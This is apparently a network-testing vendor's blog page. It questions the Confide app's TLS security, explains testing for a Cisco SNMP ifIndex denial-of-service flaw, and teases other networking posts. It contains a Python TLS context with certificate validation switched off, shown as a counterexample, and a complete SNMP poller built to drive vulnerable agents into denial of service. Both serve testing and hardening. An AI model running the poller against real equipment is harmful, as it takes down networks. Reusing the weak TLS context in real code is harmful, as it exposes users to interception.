Confide, a Favorite App of the White House, May Not Be Secure

A New York City-based start-up, Confide, offers a text messaging app “with encrypted messages that self-destruct.”  You can download the app at https://getconfide.com/

Confide lets its users “discuss sensitive topics, brainstorm ideas or give unfiltered opinions without fear of the Internet’s permanent, digital record and with no copies left behind.”  “Messages disappear forever after they are read once, making them as private and secure as the spoken word.”

What a description!  Everyone’s dream come true, right?  Certainly a perfect app for individuals wanting to communicate about classified information, military plans, or other top secret information.

It is no surprise, then, that Donald Trump and members of the White House staff allegedly use the Confide text messaging app.

Is Confide really secure?

An article in CyberScoop, an online cybersecurity news site, asserts that many of the claims made by Confide are not valid: https://www.cyberscoop.com/confide-favorite-app-trumps-white-house-triumph-marketing-substance/

Which security protocol: SSL or TLS 1.2?

First, it is unclear whether the Confide application uses the obsolete SSL 3.0 (Secure Sockets Layer) or its successor, TLS (Transport Layer Security), and, if TLS, whether it is restricted to the current version, TLS 1.2. [1]

The author cites a security researcher:

“To encrypt messages, Confide uses OpenSSL …  The OpenSSL version the app may use, 1.1.f, dates back to January 2014 and has been obsolete and broken for years.  …  The full scope of facts on how Confide works are not yet entirely clear due to the lack of transparency.”

Note the use of the word “may” above.  No one outside Confide’s engineering team knows for certain which OpenSSL version the app links against, let alone which protocol version and cipher suites it actually negotiates.

While it is certainly true that earlier versions of OpenSSL contained flaws, vulnerabilities and weaknesses, every OpenSSL release since the 1.0.1 series implements TLS 1.2 alongside the older protocols, and the current release does so without the old defects.  The Confide app would therefore be “TLS capable” whichever of those versions it links against; the library version does not by itself tell you which protocol version the app negotiates, because that is decided by how the application configures the library.  Furthermore, if the apps only ever speak to each other (or to endpoints Confide controls), it is very easy for the programmers to force the apps to negotiate only TLS 1.2 and the cipher suites of their choice and to reject everything else.

Man-in-the-Middle Attacks (MITM) [2]

The author also cites another security researcher:
“The whole point about TLS is that it can be attacked by man-in-the-middle attacks.”

However, the articles cited in support of this claim do not seem to bear it out.  The MITM tools they reference did not actually attack TLS.  None of them would necessarily have been useful or relevant against a specialized app like Confide.

All applications that fail to perform the critical step of validating the peer’s credentials (checking that the presented certificate chains to a trusted authority and is issued for the host being contacted) are vulnerable to MITM, whatever protocol they use.  The article suggests that TLS is somehow unique in this property; it is not.  The protection TLS offers against an interceptor depends precisely on that validation step being carried out.
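The two points above, that the library version does not fix the negotiated protocol and that skipping peer validation is what opens the door to a MITM, come down to a handful of settings on the TLS context.  The following is an added example written for this post, not code from Confide or from the CyberScoop article.  It uses Python’s ssl module (which wraps OpenSSL) to build a deliberately weak client context beside a pinned one, and an audit function that reports the omissions.  The CA bundle path is a hypothetical placeholder.

```python
"""Added example, not Confide's code: how an application that controls both
ends of a connection pins OpenSSL (through Python's ssl module) to TLS 1.2
or newer, to forward-secret suites and to strict peer validation, and how
to audit a context for the omissions that make a MITM possible."""
import socket
import ssl

# Hypothetical bundle holding only the operator's own CA (assumption, not
# from the article); any PEM file containing that CA would do.
TRUSTED_CA_BUNDLE = "/etc/myapp/ca.pem"


def weak_client_context():
    """A context that accepts any protocol version the library still offers
    and never checks who it is talking to.  With this, anyone on the path
    can terminate the TLS session with a certificate of their own."""
    ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
    ctx.check_hostname = False          # must be cleared before verify_mode
    ctx.verify_mode = ssl.CERT_NONE     # the credential-validation step is skipped
    return ctx


def hardened_client_context(ca_bundle=None):
    """TLS 1.2 as the floor, ECDHE suites only, peer certificate required and
    matched against the hostname.  Trust is limited to one CA when a bundle
    is given, otherwise to the platform store."""
    ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
    ctx.minimum_version = ssl.TLSVersion.TLSv1_2
    ctx.set_ciphers("ECDHE+AESGCM:ECDHE+CHACHA20")  # forward secrecy, AEAD only
    ctx.options |= ssl.OP_NO_COMPRESSION            # removes the CRIME vector
    ctx.verify_mode = ssl.CERT_REQUIRED
    ctx.check_hostname = True
    if ca_bundle:
        ctx.load_verify_locations(cafile=ca_bundle)
    else:
        ctx.load_default_certs()
    return ctx


def audit_context(ctx):
    """Return the list of weaknesses found in a client context (empty if none)."""
    findings = []
    if ctx.verify_mode != ssl.CERT_REQUIRED:
        findings.append("peer certificate not required: MITM possible")
    if not ctx.check_hostname:
        findings.append("hostname not matched against certificate")
    if ctx.minimum_version < ssl.TLSVersion.TLSv1_2:
        findings.append("protocol floor below TLS 1.2 (%s)" % ctx.minimum_version.name)
    for suite in ctx.get_ciphers():
        # TLS 1.3 suites are reported as TLS_*; every TLS 1.2 suite left
        # enabled must use an ephemeral (EC)DH key exchange.
        if not suite["name"].startswith(("ECDHE-", "DHE-", "TLS_")):
            findings.append("non-forward-secret suite enabled: " + suite["name"])
    return findings


def open_pinned_connection(host, port=443, ca_bundle=TRUSTED_CA_BUNDLE):
    """Connect with the hardened context.  server_hostname drives both SNI and
    the hostname check, so it must be the name the certificate carries."""
    ctx = hardened_client_context(ca_bundle)
    raw = socket.create_connection((host, port), timeout=10)
    return ctx.wrap_socket(raw, server_hostname=host)


if __name__ == "__main__":
    for label, ctx in (("weak", weak_client_context()),
                       ("hardened", hardened_client_context())):
        print(label, audit_context(ctx) or ["no findings"])
```

Run without arguments it prints the audit of both contexts; the weak one is flagged for missing certificate and hostname checks (and, depending on the library defaults, for a low protocol floor and RSA-key-exchange suites), the hardened one produces no findings.  Note that the hardened context is a client-side decision: none of it requires a newer OpenSSL than one that already ships TLS 1.2.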

Of course any security protocol can be implemented improperly.   That’s why we recommend using the Maxwell Pro TLS Test Suite.

Test engineers use the Maxwell Pro TLS Test Suite to find and fix bugs in their TLS stack or engine. The tests help ensure that the TLS implementation is sufficiently robust so that it is not vulnerable to the wide range of attacks in today’s Internet.

IWL encourages the Confide staff to be more forthcoming and transparent with the technologies incorporated in the Confide app, and to perform exhaustive testing and report on the results.

[1] Definition of TLS – Transport Layer Security:  https://en.wikipedia.org/wiki/Transport_Layer_Security

[2] Definition of a MITM – Man-in-the-Middle Attack:  https://en.wikipedia.org/wiki/Man-in-the-middle_attack

Simple illustration of how MITM attacks work:  https://wordtothewise.com/2014/09/cryptography-alice-bob/

Checking for New SNMP Vulnerabilities

Cisco Systems recently announced a patch for a vulnerability in Simple Network Management Protocol (SNMP) functions of some Cisco routers.  “This vulnerability could allow an authenticated, remote attacker to cause high CPU usage on an affected device, resulting in a denial of service (DoS) condition. The vulnerability is due to an incorrect initialized variable. An attacker could exploit this vulnerability by performing SNMP polling on MIBs and using only Interface Index (ifIndex) values. A successful exploit could allow the attacker to increase CPU usage to 99% on an affected device and cause a DoS condition.” (1)

Whether or not you have Cisco routers, it is worth running all the SNMP vulnerability tests in SilverCreek to verify that your own SNMP agent is not vulnerable to attacks of this kind.

For this particular vulnerability, you can use the SilverCreek Memory Leak Tool to test your agent.

Start SilverCreek and select an SNMP agent to test.  Once SilverCreek has connected to the agent (the device under test), start the Memory Leak Tool.

Select the ifIndex value to poll and let the poll run for one hour or more.  No poll interval is needed; the Tool sends poll requests back to back.

The Memory Leak Tool records and prints the agent’s memory usage and CPU usage while the poll runs.

If the agent is susceptible, continuous polling of the ifIndex variable drives its CPU usage up until it stops responding; the tester sees that no responses are coming back because a DoS (denial of service) condition has been triggered.

The results of this test help you characterize the performance of your agent and its susceptibility to this particular vulnerability.  An agent that keeps answering with stable CPU usage for the full run is not affected by this polling pattern; an agent whose CPU climbs or whose responses stop is.
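For readers who want to reproduce the polling load outside SilverCreek, here is an added example, written for this post and not SilverCreek’s own code or Cisco’s: a standard-library Python poller that encodes SNMPv2c GetRequests for IF-MIB::ifIndex by hand, sends them back to back, and records when the agent stops answering.  The target address 192.0.2.10, the community string and the interface indexes are placeholders to replace with those of the device under test.  Run it only against equipment you are authorized to test; if the agent is vulnerable, this will take it down.

```python
"""Added example, not SilverCreek's code: a minimal SNMPv2c poller that
hammers IF-MIB::ifIndex the way the post describes and records how the
agent's responsiveness degrades.  The BER encoder is written by hand so the
script needs nothing beyond the standard library."""
import socket
import time

IF_INDEX_OID = "1.3.6.1.2.1.2.2.1.1"   # IF-MIB::ifIndex; instance appended per interface


def ber_length(n):
    """Definite-form length octets: short form below 128, long form above."""
    if n < 0x80:
        return bytes([n])
    body = n.to_bytes((n.bit_length() + 7) // 8, "big")
    return bytes([0x80 | len(body)]) + body


def tlv(tag, body):
    return bytes([tag]) + ber_length(len(body)) + body


def encode_int(value):
    """Non-negative INTEGER; the extra leading byte keeps values >= 128 positive."""
    body = value.to_bytes((value.bit_length() + 8) // 8, "big")
    return tlv(0x02, body)


def encode_oid(dotted):
    arcs = [int(a) for a in dotted.strip(".").split(".")]
    out = bytearray([40 * arcs[0] + arcs[1]])
    for arc in arcs[2:]:
        chunk = bytearray([arc & 0x7F])
        arc >>= 7
        while arc:                       # base-128 with continuation bit
            chunk.insert(0, 0x80 | (arc & 0x7F))
            arc >>= 7
        out += chunk
    return tlv(0x06, bytes(out))


def build_get_request(community, oids, request_id):
    """SNMPv2c GetRequest-PDU (context tag 0) inside the message SEQUENCE."""
    varbinds = b"".join(tlv(0x30, encode_oid(o) + b"\x05\x00") for o in oids)
    pdu = tlv(0xA0, encode_int(request_id) + encode_int(0) + encode_int(0)
              + tlv(0x30, varbinds))
    return tlv(0x30, encode_int(1) + tlv(0x04, community.encode()) + pdu)


def poll_ifindex(host, community="public", port=161, ifindexes=(1,),
                 duration_s=3600, timeout_s=2.0, give_up_after=25):
    """Send GetRequests for the given ifIndex instances with no inter-poll
    delay until the duration elapses or the agent has failed to answer
    give_up_after consecutive polls (the DoS state the advisory describes).
    Any datagram that arrives is counted as an answer; replies are not parsed."""
    oids = ["%s.%d" % (IF_INDEX_OID, i) for i in ifindexes]
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    sock.settimeout(timeout_s)
    stats = {"sent": 0, "answered": 0, "timeouts": 0,
             "slowest_ms": 0.0, "unresponsive": False}
    silent, request_id = 0, 1
    deadline = time.monotonic() + duration_s
    try:
        while time.monotonic() < deadline:
            packet = build_get_request(community, oids, request_id)
            started = time.monotonic()
            sock.sendto(packet, (host, port))
            stats["sent"] += 1
            try:
                sock.recvfrom(65535)
                rtt_ms = (time.monotonic() - started) * 1000.0
                stats["answered"] += 1
                stats["slowest_ms"] = max(stats["slowest_ms"], rtt_ms)
                silent = 0
            except (socket.timeout, ConnectionRefusedError):
                stats["timeouts"] += 1
                silent += 1
                if silent >= give_up_after:
                    stats["unresponsive"] = True
                    break
            request_id = request_id % 0x7FFFFFFF + 1   # stays a positive INTEGER
    finally:
        sock.close()
    return stats


if __name__ == "__main__":
    # 192.0.2.10 is documentation address space; substitute the device under test.
    print(poll_ifindex("192.0.2.10", ifindexes=(1, 2, 3), duration_s=60))
```

The counters it returns (polls sent, answered, timed out, slowest round trip, and whether the agent went silent) give the same kind of before-and-after comparison the Memory Leak Tool provides, minus the CPU and memory readings, which have to come from the device itself.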


 (1)  Source:  https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20170201-asrsnmp

More on SDN Complexity and Reality

SDN:  Software Defined Networks

“SDN Complexity and Reality” by Russ White and Shawn Zandi was published on page 31 of The Internet Protocol Journal, November 2016 (Volume 19, Number 3).  You can download ipj19-3.pdf at http://ipj.dreamhosters.com/.

In the article, White and Zandi examine the three elements that were originally central to the SDN story:

First, SDNs were supposed to remove the intelligence from the distributed control planes and consolidate that intelligence in a centralized controller.

Continue reading More on SDN Complexity and Reality

Why You Should Care About Impairment Testing of Internet Protocols


The Internet Is An Imperfect and Hostile Place

The world is an imperfect place.  The internet is no exception.  The internet has its good days and it has its bad days.  Or to be more precise, the internet has its good seconds and its bad seconds.

Blemishes in internet performance arise from many sources. Continue reading Why You Should Care About Impairment Testing of Internet Protocols

Waveforms in KMAX

Real network conditions are rarely static.  Real life networks suffer transient conditions – congestion builds up and dissipates, tree branches wave in the wind across radio links, long distance routing paths change, VoIP call trunks are filled with more calls during working hours than during the evening.  Even something as small as a person standing near a wi-fi access point can change the carrying capacity of a network.

KMAX (and our Maxwell Pro) can emulate these kinds of changes.

Continue reading Waveforms in KMAX

ESP8266/NodeMCU TCP Test Reveals Issues

The ESP8266 is very popular among the maker set as a platform for experimentation in the realm of Internet of Things (IoT).

We have been playing around with the ESP8266 micro-controller running NodeMCU, loading simple Lua programs onto it to get familiar with its capabilities.

Now that we’re reasonably familiar with its capabilities, it’s time we put ESP8266/NodeMCU to test.
Continue reading ESP8266/NodeMCU TCP Test Reveals Issues

New Cloud Testing Paradigm Comes With Challenges that Network Emulators Can Solve


Cloud computing has taken hold of the business world, nearly reaching its saturation point according to multiple industry reports. The business cloud and its cloud testing capabilities are growing at an extremely fast pace due to scalability, adaptability, cost-effectiveness, and efficiency across nearly every industry.
Continue reading New Cloud Testing Paradigm Comes With Challenges that Network Emulators Can Solve